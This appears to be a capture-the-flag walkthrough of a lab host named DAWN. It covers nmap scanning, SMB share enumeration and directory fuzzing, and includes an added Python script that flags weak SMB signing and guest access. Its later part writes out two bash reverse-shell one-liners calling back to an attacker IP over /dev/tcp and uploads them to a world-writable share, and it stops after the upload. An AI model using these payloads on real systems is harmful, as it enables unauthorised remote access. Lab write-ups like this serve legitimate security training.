PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
3306/tcp open mysql MySQL 5.5.5-10.3.15-MariaDB-1
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.3.15-MariaDB-1
| Thread ID: 17
| Capabilities flags: 63486
| Some Capabilities: Support41Auth, SupportsLoadDataLocal, InteractiveClient, SupportsTransactions, FoundRows, DontAllowDatabaseTableColumn, Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, IgnoreSigpipes, LongColumnFlag, SupportsCompression, Speaks41ProtocolOld, ODBCClient, ConnectWithDatabase, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
| Status: Autocommit
| Salt: $+L|LEVabI(+@=QbwPjE
|_ Auth Plugin Name: mysql_native_password
Service Info: Host: DAWN
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-07-05T15:52:02
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.9.5-Debian)
| Computer name: dawn
| NetBIOS computer name: DAWN\x00
| Domain name: dawn
| FQDN: dawn.dawn
|_ System time: 2022-07-05T11:52:03-04:00
|_clock-skew: mean: 1h20m01s, deviation: 2h18m35s, median: 0s
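Read from the defender's side, the SMB results in the scan above are the first thing to flag. The following is an added example, not part of the original write-up: it parses nmap host-script output and maps each weak SMB result to a Samba setting to review. The function names, finding ids and suggested smb.conf settings are assumptions of the example.

```python
import re

# Constructed sample: the SMB host-script lines from the scan output above.
SAMPLE_SCAN = """\
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 1h20m01s, deviation: 2h18m35s, median: 0s
"""

# A script block starts with "| name:" and nothing after the colon.
HEADER = re.compile(r"^\|\s*([a-z][a-z0-9]*(?:-[a-z0-9]+)+):\s*$")

# (finding id, script, substring to look for, smb.conf setting to review)
CHECKS = [
    ("signing-disabled", "smb-security-mode", "message_signing: disabled",
     "server signing = mandatory"),
    ("signing-not-required", "smb2-security-mode", "enabled but not required",
     "server signing = mandatory"),
    ("guest-session", "smb-security-mode", "account_used: guest",
     "map to guest = never"),
]

def parse_host_scripts(text):
    """Group nmap host-script output lines under the script that printed them."""
    scripts, current = {}, None
    for line in text.splitlines():
        header = HEADER.match(line)
        if header:
            current = header.group(1)
            scripts[current] = []
        elif current and line.startswith("|"):
            scripts[current].append(line.lstrip("|_ ").strip())
            if line.startswith("|_"):  # "|_" marks a script's last line
                current = None
    return scripts

def smb_findings(text):
    """Return (finding id, setting to review) for each weak SMB result."""
    scripts = parse_host_scripts(text)
    return [(fid, fix) for fid, script, needle, fix in CHECKS
            if any(needle in row for row in scripts.get(script, []))]

if __name__ == "__main__":
    for fid, fix in smb_findings(SAMPLE_SCAN):
        print(f"{fid}: review '{fix}' in smb.conf")
```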
SMB is enabled, so let's list the shares.
┌──(kali㉿VirtualBox)-[~]
└─$ smbclient -L \\\\192.168.81.11\\
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
ITDEPT Disk PLEASE DO NOT REMOVE THIS SHARE. IN CASE YOU ARE NOT AUTHORIZED TO USE THIS SYSTEM LEAVE IMMEADIATELY.
IPC$ IPC IPC Service (Samba 4.9.5-Debian)
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP WIN2K3STDVIC
After looking around and finding nothing interesting, move on to directory fuzzing.
┌──(kali㉿VirtualBox)-[~]
└─$ gobuster dir -u 192.168.81.11 -w /usr/share/wordlists/dirb/common.txt -q -t 200
/.htpasswd (Status: 403) [Size: 297]
/.hta (Status: 403) [Size: 292]
/.htaccess (Status: 403) [Size: 297]
/index.html (Status: 200) [Size: 791]
/logs (Status: 301) [Size: 313] [--> http://192.168.81.11/logs/]
/server-status (Status: 403) [Size: 301]
The /logs directory looks suspicious here.

From management.log we only learn that there are two users, dawn and ganimedes.

There is also a directory whose permissions are set to 777 with chmod.

One of the SMB shares is ITDEPT, and management.log tells us that ITDEPT is writable by everyone.
We can put reverse shells named web-control and product-control inside the ITDEPT/ folder and find a way to trigger them.
We can also run enum4linux to learn more about the host:
enum4linux -a 192.168.81.11
Craft the payloads:
┌──(kali㉿VirtualBox)-[~]
└─$ cat web-control
bash -c 'exec bash -i &>/dev/tcp/192.168.49.81/1234 <&1'
┌──(kali㉿VirtualBox)-[~]
└─$ cat product-control
bash -c 'exec bash -i &>/dev/tcp/192.168.49.81/4444 <&1'
Connect to the ITDEPT share over SMB and upload the two payloads:
┌──(kali㉿VirtualBox)-[~]
└─$ smbclient \\\\192.168.81.11\\ITDEPT
smb: \> put product-control
smb: \> put web-control
smb: \> ls
. D 0 Fri Jul 8 05:58:39 2022
.. D 0 Wed Jul 22 13:19:41 2020
web-control A 57 Fri Jul 8 05:58:40 2022
product-control A 57 Fri Jul 8 05:58:33 2022